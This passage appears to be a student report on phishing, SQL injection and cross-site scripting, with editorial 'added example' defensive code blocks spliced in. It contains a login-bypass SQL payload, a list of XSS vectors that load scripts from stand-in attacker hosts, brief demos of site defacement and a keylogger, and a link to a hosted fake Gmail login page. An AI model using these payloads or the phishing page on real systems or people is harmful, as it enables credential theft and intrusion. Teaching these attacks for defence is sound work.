online say they have decreased the frequency of their
purchases.

• Difficulties in Law Enforcement Investigations. Unlike certain
other types of identity theft that law enforcement agencies
can successfully investigate in a single geographic area (e.g.,
theft of wallets, purses, or mail), phishing – like other types of
crime that exploit the Internet – can be conducted from any
location where phishers can obtain Internet access. This can
include situations in which a phisher in one country takes
control of a computer in another country, then uses that
computer to host his phishing website or send his phishing e-
mails to residents of still other countries. Moreover, online
criminal activity in recent years has often reflected clear-cut
divisions of labor. For example, in an online fraud scheme, the
tasks of writing code, locating hosts for phishing sites,
spamming, and other components of a full-scale phishing
operation may be divided among people in various locations.
This means that in some phishing investigations, timely
cooperation between law enforcement agencies in multiple
countries may be necessary for tracing, identification, and
apprehension of the criminals behind the scheme.

• Incentives for Cross-Border Operations by Criminal
Organizations. Law enforcement authorities in Canada and the
United States are concerned that each of the preceding factors
also creates incentives for members of full-fledged criminal
organizations in various countries to conduct phishing
schemes on a systematic basis. Law enforcement already has
indications that criminal groups in Europe are hiring or
contracting with hackers to produce phishing e-mails and
websites and develop malicious code for use in phishing
attacks.

1. Prevention: What to Do?

• Protect your computer with anti-virus software, spyware
filters, e-mail filters, and firewall programs, and make sure
that they are regularly updated.

o Consider installing a Web browser tool bar to help protect
you from known phishing fraud websites. (Check with your
browser or e-mail provider for such toolbars.)

• Ensure that your Internet browser is up to date and security
patches are applied.
o In particular, people who use the Microsoft Internet Explorer
browser should immediately go to the Microsoft Security home
page—http://www.microsoft.com/security/—to download a
special patch relating to certain phishing schemes.

• Be suspicious of any e-mail with urgent requests for personal
financial information or threats of termination of online
accounts.
o Unless the e-mail is digitally signed, you can't be sure it
wasn't forged or “spoofed.”
o Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
o Phisher e-mails are typically not personalized, while valid
messages from your bank or e-commerce company generally
are.

• When contacting your financial institution, use only channels
that you know from independent sources are reliable (e.g.,
information on your bank card, hard-copy correspondence, or
monthly account statement), and don’t rely on links contained
in e-mails, even if the web address appears to be correct.

• Always ensure that you're using a secure website when
submitting credit card or other sensitive information via your
Web browser.
o To make sure you're on a secure Web server, check the
beginning of the Web address in your browser's address bar - it
should be "https://" rather than just "http://".

• Regularly log into your online accounts.

o Don't leave them for as long as a month before you check
each account.

• Regularly check your bank, credit and debit card statements
to ensure that all transactions are legitimate.

o If anything is suspicious, contact your bank and all card
issuers.

• Don't assume that you can correctly identify a website as
legitimate just by looking at its general appearance.
• Don’t use the links in an e-mail to get to any web page, if you
suspect the message might not be authentic.

o Instead, call the company on the telephone, or log onto the
website directly by typing in the Web address in your browser.

• Avoid filling out forms in e-mail messages or pop-up windows
that ask for personal financial information.

o You should only communicate information such as credit card
numbers or account information via a secure website or the
telephone.
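The link checks in the bullets above (use only addresses you know from an independent source, look for "https://", don't trust a link just because the text looks right) can be made mechanical. The following is an added example, not part of the original document: a small Python checker that pulls every URL out of an e-mail body and flags those that are not HTTPS, whose host is not under the institution's real domain, or that hide the real host behind a user@ prefix or a bare IP address. The domain example-bank.com and the message text are constructed for illustration.

```python
"""Flag links in an e-mail body that do not lead to the institution they
claim to come from.  Added example; the trusted domain and the sample
message below are constructed, not taken from any real bank."""
import re
from urllib.parse import urlparse

# The institution's real domain, learned from an independent source such as
# the printed statement or the back of the bank card (constructed value).
TRUSTED_DOMAIN = "example-bank.com"

# Crude but adequate URL extractor for plain-text mail bodies.
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def check_link(url: str, trusted_domain: str = TRUSTED_DOMAIN) -> list[str]:
    """Return the warnings for one URL; an empty list means nothing was found."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower().rstrip(".")
    warnings = []
    if parts.scheme != "https":
        warnings.append("not https")
    if parts.username is not None:
        # http://www.example-bank.com@203.0.113.5/ : the part before '@' is
        # a user name, and the browser connects to what follows it.
        warnings.append("user@ prefix hides the real host")
    if IPV4_RE.fullmatch(host):
        warnings.append("host is a bare IP address")
    elif host != trusted_domain and not host.endswith("." + trusted_domain):
        # 'example-bank.com.evil.net' ends with the bank's name but its
        # registrable domain is evil.net, so this test rejects it.
        warnings.append("host %r is not under %s" % (host, trusted_domain))
    return warnings


def scan_message(body: str, trusted_domain: str = TRUSTED_DOMAIN) -> dict[str, list[str]]:
    """Map each flagged URL in the body to its warnings."""
    findings = {}
    for url in URL_RE.findall(body):
        warnings = check_link(url, trusted_domain)
        if warnings:
            findings[url] = warnings
    return findings


# Constructed message in the style the text describes: urgency plus links.
SAMPLE_EMAIL = """\
Dear valued customer,
Your account will be blocked unless you verify your PIN within 24 hours.
Verify now: http://example-bank.com.evil.net/verify
Alternate link: http://www.example-bank.com@203.0.113.5/login
Your statements remain available at https://online.example-bank.com/statements
"""

if __name__ == "__main__":
    for url, warnings in scan_message(SAMPLE_EMAIL).items():
        print(url, "->", "; ".join(warnings))
```

Only the first two links in the sample are reported; the third is HTTPS and sits under the bank's own domain. A checker like this does not replace the advice to type the address yourself, because a phisher can also register an HTTPS site on an unrelated domain, but it catches the common tricks of reusing the bank's name inside a longer hostname or in front of an "@".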

Reporting: Suspicious E-mails and Websites

• Always report a "phishing" or “spoofed” e-mail or website to
the following groups, whether or not you responded to that
phishing e-mail or website:

o Forward the e-mail to reportphishing@antiphishing.com

o Forward the e-mail to the "abuse" e-mail address at the
company that is being spoofed (e.g. "spoof@ebay.com")

o In the United States, forward the e-mail to the Federal Trade
Commission (FTC) at spam@uce.gov and notify the Internet
Crime Complaint Center (IC3) by filing a complaint on its
website, http://www.ifccfbi.gov.

o The IC3 is a joint venture of the FBI and a non-profit
organization, the National White Collar Crime Center (NW3C).
Through the IC3 website, victims of online crime, including
identity theft, can report possible criminal activity. Staff at IC3
analyze these complaints for patterns and levels of possible
criminal conduct and, in appropriate cases, provide
investigative packages of complaint data and other
information to federal, state or local investigators and
prosecutors in various metropolitan areas throughout the U.S.
The IC3 also shares its Internet fraud and identity theft
complaint data with the FTC for inclusion in the FTC’s Identity
Theft Data Clearinghouse.

SQL INJECTION
SQL Injection: What is it?
SQL Injection is one of the many web attack mechanisms used
by hackers to steal data from organizations. It is perhaps one
of the most common application layer attack techniques used
today. It is the type of attack that takes advantage of improper
coding of your web applications that allows a hacker to inject
SQL commands into, say, a login form to allow them to gain
access to the data held within your database.

In essence, SQL Injection arises because the fields available for
user input allow SQL statements to pass through and query the
database directly.

SQL Injection: An In-depth Explanation

Web applications allow legitimate website visitors to submit
and retrieve data to/from a database over the Internet using
their preferred web browser. Databases are central to modern
websites – they store data needed for websites to deliver
specific content to visitors and render information to
customers, suppliers, employees and a host of stakeholders.
User credentials, financial and payment information, company
statistics may all be resident within a database and accessed
by legitimate users through off-the-shelf and custom web
applications. Web applications and databases allow you to
regularly run your business.

SQL Injection is the hacking technique which attempts to pass
SQL commands (statements) through a web application for
execution by the backend database. If not sanitized properly,
web applications may result in SQL Injection attacks that allow
hackers to view information from the database and/or even
wipe it out.

Such features as login pages, support and product request
forms, feedback forms, search pages, shopping carts and the
general delivery of dynamic content, shape modern websites
and provide businesses with the means necessary to
communicate with prospects and customers. These website
features are all examples of web applications which may be
either purchased off-the-shelf or developed as bespoke
programs.

These website features are all susceptible to SQL Injection
attacks which arise because the fields available for user input
allow SQL statements to pass through and query the database
directly.

SQL Injection: A Simple Example

Take a simple login page where a legitimate user would enter
his username and password combination to enter a secure area
to view his personal details or upload his comments in a forum.

When the legitimate user submits his details, an SQL query is
generated from these details and submitted to the database
for verification. If valid, the user is allowed access. In other
words, the web application that controls the login page will
communicate with the database through a series of planned
commands so as to verify the username and password
combination. On verification, the legitimate user is granted
appropriate access.

Through SQL Injection, the hacker may input specifically
crafted SQL commands with the intent of bypassing the login
form barrier and seeing what lies behind it. This is only
possible if the inputs are not properly sanitised (i.e., made
invulnerable) and sent directly with the SQL query to the
database. SQL Injection vulnerabilities provide the means for a
hacker to communicate directly to the database.

The technologies vulnerable to this attack are dynamic script
languages including ASP, ASP.NET, PHP, JSP, and CGI. All an
attacker needs to perform an SQL Injection hacking attack is a
web browser, knowledge of SQL queries and creative guess
work to important table and field names. The sheer simplicity
of SQL Injection has fuelled its popularity.

Other contents:
Why is it possible to pass SQL Queries to the database even
though this is hidden behind a firewall?
Is my database at risk to SQL Injection?

What is the impact of SQL Injection?
Example of a SQL Injection Attack
How do I prevent SQL Injection attacks?

Why is it possible to pass SQL queries directly to a database
that is hidden behind a firewall and any other security
mechanism?
Firewalls and similar intrusion detection mechanisms provide
little or no defense against full-scale SQL Injection web
attacks.

Since your website needs to be public, security mechanisms
will allow public web traffic to communicate with your web
application/s (generally over port 80/443). The web application
has open access to the database in order to return (update)
the requested (changed) information.

In SQL Injection, the hacker uses SQL queries and creativity to
get to the database of sensitive corporate data through the
web application.

SQL or Structured Query Language is the computer language
that allows you to store, manipulate, and retrieve data stored
in a relational database (or a collection of tables which
organise and structure data). SQL is, in fact, the only way that
a web application (and users) can interact with the database.
Examples of relational databases include Oracle, Microsoft
Access, MS SQL Server, MySQL, and Filemaker Pro, all of which
use SQL as their basic building blocks.

SQL commands include SELECT, INSERT, DELETE and DROP
TABLE. DROP TABLE is as ominous as it sounds and in fact will
eliminate the table with a particular name.

In the legitimate scenario of the login page example above, the
SQL commands planned for the web application may look like
the following:

SELECT count(*)
FROM users_list_table
WHERE username='FIELD_USERNAME'
AND password='FIELD_PASSWORD'

In plain English, this SQL command (from the web application)
instructs the database to match the username and password
input by the legitimate user to the combination it has already
stored.

Each type of web application is hard coded with specific SQL
queries that it will execute when performing its legitimate
functions and communicating with the database. If any input
field of the web application is not properly sanitised, a hacker
may inject additional SQL commands that broaden the range of
SQL commands the web application will execute, thus going
beyond the original intended design and function.

A hacker will thus have a clear channel of communication (or,
in layman terms, a tunnel) to the database irrespective of all
the intrusion detection systems and network security
equipment installed before the physical database server.

Is my database at risk to SQL Injection?

SQL Injection is one of the most common application layer
attacks currently being used on the Internet. Despite the fact
that it is relatively easy to protect against SQL Injection, there
are a large number of web applications that remain vulnerable.

According to the Web Application Security Consortium (WASC)
9% of the total hacking incidents reported in the media until
27th July 2006 were due to SQL Injection. More recent data
from our own research shows that about 50% of the websites
we have scanned this year are susceptible to SQL Injection
vulnerabilities.

It may be difficult to answer the question whether your web
site and web applications are vulnerable to SQL Injection
especially if you are not a programmer or you are not the
person who has coded your web applications.

Our experience leads us to believe that there is a significant
chance that your data is already at risk from SQL Injection.

Whether an attacker is able to see the data stored on the
database or not, really depends on how your website is coded
to display the results of the queries sent. What is certain is
that the attacker will be able to execute arbitrary SQL
Commands on the vulnerable system, either to compromise it
or else to obtain information.

If improperly coded, then you run the risk of having your
customer and company data compromised.

What an attacker gains access to also depends on the level of
security set by the database. The database could be set to
restrict to certain commands only. A read access normally is
enabled for use by web application back ends.

Even if an attacker is not able to modify the system, he would
still be able to read valuable information.

What is the impact of SQL Injection?

Once an attacker realizes that a system is vulnerable to SQL
Injection, he is able to inject SQL Query / Commands through
an input form field. This is equivalent to handing the attacker
your database and allowing him to execute any SQL command
including DROP TABLE to the database!

An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information. Depending on
the back-end database in use, SQL injection vulnerabilities
lead to varying levels of data/system access for the attacker. It
may be possible to manipulate existing queries, to UNION
(used to select related information from two tables) arbitrary
data, use subselects, or append additional queries.

In some cases, it may be possible to read in or write out to
files, or to execute shell commands on the underlying
operating system. Certain SQL Servers such as Microsoft SQL
Server contain stored and extended procedures (database
server functions). If an attacker can obtain access to these
procedures, it could spell disaster.

Unfortunately the impact of SQL Injection is only uncovered
when the theft is discovered. Data is being unwittingly stolen
through various hack attacks all the time. The more expert of
hackers rarely get caught.

Example of a SQL Injection Attack
Here is a sample basic HTML form with two inputs, login and
password.

<form method="post"
action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for the login.asp to work is by building a
database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'

If the variables $username and $password are requested
directly from the user's input, this can easily be compromised.
Suppose that we gave "Joe" as a username and that the
following string was provided as a password: anything' OR
'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised,
the use of the single quotes has turned the WHERE SQL
command into a two-component clause.

The 'x'='x' part guarantees to be true regardless of what the
first part contains.

This will allow the attacker to bypass the login form without
actually knowing a valid username / password combination!

How do I prevent SQL Injection attacks?

Firewalls and similar intrusion detection mechanisms provide
little defense against full-scale web attacks. Since your
website needs to be public, security mechanisms will allow
public web traffic to communicate with your database servers
through web applications. Isn’t this what they have been
designed to do?

Patching your servers, databases, programming languages and
operating systems is critical but is in no way the best way to
prevent SQL Injection Attacks.
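The fix the article does not get to is to keep user input out of the SQL text altogether. The following added example (my own code, not the article's) reproduces the login query from the example above in Python against an in-memory SQLite database, once built by string formatting as the vulnerable login.asp does and once with placeholders, and runs both with the password anything' OR 'x'='x. The logins table, the user Joe and the stored password are constructed.

```python
"""The article's login query built two ways: pasted together from user
input, and sent with placeholders.  Added example, not the article's
code; the table, the user 'Joe' and the password value are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed user.  The password is stored
    in clear text only to keep the example short; a real system stores a
    salted hash and compares against that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO logins VALUES (1, 'Joe', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    # Same construction as the article's login.asp: the input is pasted into
    # the SQL text, so a quote in the input becomes part of the statement.
    sql = ("SELECT id FROM logins WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    # Placeholders: the driver sends the values separately from the SQL
    # text, so a quote in the input is only ever compared as data.
    sql = "SELECT id FROM logins WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    """Run both versions with the real password and with the injected one.
    A row (1,) means the login succeeded; None means it was refused."""
    conn = make_db()
    payload = "anything' OR 'x'='x"   # the password string from the article
    return {
        "vulnerable_real": login_vulnerable(conn, "Joe", "s3cret"),
        "vulnerable_injected": login_vulnerable(conn, "Joe", payload),
        "safe_real": login_safe(conn, "Joe", "s3cret"),
        "safe_injected": login_safe(conn, "Joe", payload),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, "->", "logged in" if row else "refused")
```

The string-built query accepts the injected password because the statement it executes is the two-component WHERE clause shown above; the placeholder version refuses it because the whole string, quotes included, is compared against the stored password. The same applies to every database driver the article lists: each one offers parameterised (prepared) statements, and using them everywhere user input reaches SQL is the control that patching alone cannot provide.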

Cross Site Scripting (XSS)

What is Cross Site Scripting?

Hackers are constantly experimenting with a wide repertoire of
hacking techniques to compromise websites and web
applications and make off with a treasure trove of sensitive
data including credit card numbers, social security numbers
and even medical records.

Cross Site Scripting (also known as XSS or CSS) is generally
believed to be one of the most common application layer
hacking techniques.
The pie-chart below, created from the Web Hacking Incident
Database (WHID) for 2011, clearly shows that whilst many
different attack methods exist, SQL injection and XSS are the
most popular. To add to this, many other attack methods, such
as Information Disclosures, Content Spoofing and Stolen
Credentials could all be side-effects of an XSS attack.

In general, cross-site scripting refers to that hacking technique
that leverages vulnerabilities in the code of a web application
to allow an attacker to send malicious content from an end-
user and collect some type of data from the victim.

Today, websites rely heavily on complex web applications to
deliver different output or content to a wide variety of users
according to set preferences and specific needs. This arms
organizations with the ability to provide better value to their
customers and prospects. However, dynamic websites suffer
from serious vulnerabilities rendering organizations helpless
and prone to cross site scripting attacks on their data.

"A web page contains both text and HTML markup that is
generated by the server and interpreted by the client browser.
Web sites that generate only static pages are able to have full
control over how the browser interprets these pages. Web
sites that generate dynamic pages do not have complete
control over how their outputs are interpreted by the client.
The heart of the issue is that if mistrusted content can be
introduced into a dynamic page, neither the web site nor the
client has enough information to recognize that this has
happened and take protective actions." (CERT Coordination
Center).

Cross Site Scripting allows an attacker to embed
malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a
vulnerable dynamic page to fool the user, executing the script
on his machine in order to gather data. The use of XSS might
compromise private information, manipulate or steal cookies,
create requests that can be mistaken for those of a valid user,
or execute malicious code on the end-user systems. The data is
usually formatted as a hyperlink containing malicious content
and which is distributed over any possible means on the
internet.
As a hacking tool, the attacker can formulate and distribute a
custom-crafted CSS URL just by using a browser to test the
dynamic website response. The attacker also needs to know
some HTML, JavaScript and a dynamic language, to produce a
URL which is not too suspicious-looking, in order to attack a
XSS vulnerable website.

Any web page which passes parameters to a database can be
vulnerable to this hacking technique. Usually these are present
in Login forms, Forgot Password forms, etc…

N.B. Often people refer to Cross Site Scripting as CSS or XSS,
which can be confused with Cascading Style Sheets (CSS).

The Theory of XSS

In a typical XSS attack the hacker infects a legitimate web
page with his malicious client-side script. When a user visits
this web page the script is downloaded to his browser and
executed. There are many slight variations to this theme,
however all XSS attacks follow this pattern, which is depicted
in the diagram below.

As a web developer you are putting measures in place to
secure the first step of the attack. You want to prevent the
hacker from infecting your innocent web page with his
malicious script. There are various ways to do that, and this
article goes into some technical detail on the most important
techniques that you must use to disable this sort of attack
against your users.

XSS Attack Vectors

So how does a hacker infect your web page in the first place?
You might think, that for an attacker to make changes to your
web page he must first break the security of the web server
and be able to upload and modify files on that server.
Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They
are dynamic and filled with ever changing content. Modern
web pages pull data from many different sources. This data is
amalgamated with your own web page and can contain simple
text, or images, and can also contain HTML tags such as <p>
for paragraph, <img> for image and <script> for scripts. Many
times the hacker will use the ‘comments’ feature of your web
page to insert a comment that contains a script. Every user
who views that comment will download the script which will
execute on his browser, causing undesirable behaviour.
Something as simple as a Facebook post on your wall can
contain a malicious script, which if not filtered by the Facebook
servers will be injected into your Wall and execute on the
browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land
on your web page from an external source has the potential of
being infected with a malicious script, but in what form does
the data come?

<SCRIPT>
The <SCRIPT> tag is the most popular way and sometimes
easiest to detect. It can arrive to your page in the following
forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
Embedded script:

<SCRIPT> alert("XSS"); </SCRIPT>


<BODY>
The <BODY> tag can contain an embedded script by using the
ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>
The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">
<IMG>
Some browsers will execute a script when found in the <IMG>
tag as shown here:

<IMG SRC="javascript:alert('XSS');">
There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This
imported HTML can contain a script.

<IFRAME SRC="http://hacker-site.com/xss.html">
<INPUT>
If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it
can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


<LINK>
The <LINK> tag, which is often used to link to external style
sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">


<TABLE>
The BACKGROUND attribute of the TABLE tag can be exploited
to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">
The same applies to the <TD> tag, used to separate cells
inside a table:

<TD BACKGROUND="javascript:alert('XSS')">
<DIV>
The <DIV> tag, similar to the <TABLE> and <TD> tags can also
specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">


The <DIV> STYLE attribute can also be manipulated in the
following way:

<DIV STYLE="width: expression(alert('XSS'));">


<OBJECT>
The <OBJECT> tag can be used to pull in a script from an
external site in the following way:

<OBJECT TYPE="text/x-scriptlet"
DATA="http://hacker.com/xss.html">
<EMBED>
If the hacker places a malicious script inside a flash file, it can
be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf"
AllowScriptAccess="always">
Is your site vulnerable to Cross Site Scripting?

Our experience leads us to conclude that the cross-site
scripting vulnerability is one of the most widespread flaws on
the Internet and will occur anywhere a web application
uses input from a user in the output it generates without
validating it. Our own research shows that over a third of the
organizations applying for our free audit service are vulnerable
to Cross Site Scripting. And the trend is upward.

Example of a Cross Site Scripting Attack

As a simple example, imagine a search engine site which is
open to an XSS attack. The query screen of the search engine
is a simple single field form with a submit button. Whereas the
results page, displays both the matched results and the text
you are looking for.

Search Results for "XSS Vulnerability"

To be able to bookmark pages, search engines generally leave
the entered variables in the URL address. In this case the URL
would look like:

http://test.searchengine.com/search.php?q=XSS%20Vulnerability

Next we try to send the following query to the search engine:

<script type="text/javascript"> alert ('This is an XSS Vulnerability') </script>

By submitting the query to search.php, it is encoded and the
resulting URL would be something like:

http://test.searchengine.com/search.php?q=%3Cscript%3Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%29%3C%2Fscript%3E

Upon loading the results page, the test search engine would
probably display no results for the search but it will display a
JavaScript alert which was injected into the page by using the
XSS vulnerability.
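Whether that alert fires depends entirely on what search.php does with the q parameter before writing it into the page. The following added example (not the article's own search.php, which is stood in for by a small Python function) decodes the q parameter from the URL above and renders the results heading twice: once by echoing the term as-is, as the vulnerable page does, and once through html.escape, which is the output encoding a page needs before placing user input inside HTML text. The heading markup is a constructed stand-in.

```python
"""The search page's handling of q, rendered two ways.  Added example, not
the article's search.php; the heading markup is a constructed stand-in."""
import html
from urllib.parse import urlsplit, parse_qs

# The encoded URL from the example above.  %91 and %92 are the Windows-1252
# curly quotes the original article's encoder produced, so the query string
# is decoded as cp1252 to reproduce the term exactly.
EXAMPLE_URL = ("http://test.searchengine.com/search.php?q=%3Cscript%3E"
               "alert%28%91This%20is%20an%20XSS%20Vulnerability%92%29"
               "%3C%2Fscript%3E")


def query_from_url(url: str) -> str:
    """Return the decoded q parameter, or '' if it is absent."""
    params = parse_qs(urlsplit(url).query, encoding="cp1252")
    return params.get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    # Echoes the search term straight into the HTML, as the vulnerable
    # search.php does: a <script> in q becomes a <script> in the page.
    return '<h2>Search Results for "%s"</h2>' % q


def render_safe(q: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser displays the
    # term as text and never parses it as markup.  This is the right encoding
    # for HTML text and attribute values; a value placed inside a <script>
    # block or a URL needs JavaScript or URL encoding instead.
    return '<h2>Search Results for "%s"</h2>' % html.escape(q, quote=True)


def contains_script_tag(page: str) -> bool:
    """Cheap check a test can use: does the rendered page carry a live tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_from_url(EXAMPLE_URL)
    print("decoded q:", term)
    print("vulnerable:", render_vulnerable(term))
    print("escaped:   ", render_safe(term))
```

The escaped rendering still shows the visitor exactly what they typed, including the angle brackets, so nothing is lost by encoding; the only difference is that the browser receives &lt;script&gt; as text rather than as a tag.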

How to Check for Cross Site Scripting Vulnerabilities
To check for Cross site scripting vulnerabilities, use a Web
Vulnerability Scanner. A Web Vulnerability Scanner crawls your
entire website and automatically checks for Cross Site
Scripting vulnerabilities. It will indicate which URLs/scripts are
vulnerable to these attacks so that you can fix the
vulnerability easily. Besides Cross site scripting vulnerabilities
a web application scanner will also check for SQL injection &
other web vulnerabilities.
Acunetix Web Vulnerability Scanner scans for SQL injection,
Cross site scripting, Google hacking and many more
vulnerabilities.
Preventing Cross Site Scripting Attacks

The purpose of this article is to define Cross Site Scripting
attacks and give some practical examples. Preventing XSS
attacks requires diligence from the part of the programmers
and the necessary security testing. You can learn more about
preventing cross-site scripting attacks here.

Working of XSS

SQL INJECTION DEMO

FOLLOWING WEBSITE IS USED FOR SQL INJECTION

ATTACK DOES

1. Opens the admin panel.
2. Cracks all the users' sensitive information.
3. Able to access all user tables.

4. After logging in to the admin panel we can make
changes and deface the site.
5. We got important login information which
can be misused.

Hacked:

Keylogger Demo
The following keylogger is used: Emissary
Keylogger

Attack Does:

1. Gets all the log files and the keystrokes of
the victim's computer
2. Brings all the screenshots
3. Disables regedit.exe
4. Disables the task manager
5. Blocks the sites listed by the attacker

Phishing Demo

EXECUTING PHISHING ON WELL KNOWN SITE GMAIL

Link : http://freethemes00.t35.com/gmail%20login/

ATTACK DOES:

1. Gets the victim's Gmail username and
password
2. The site can be any site; it may be your
bank account site
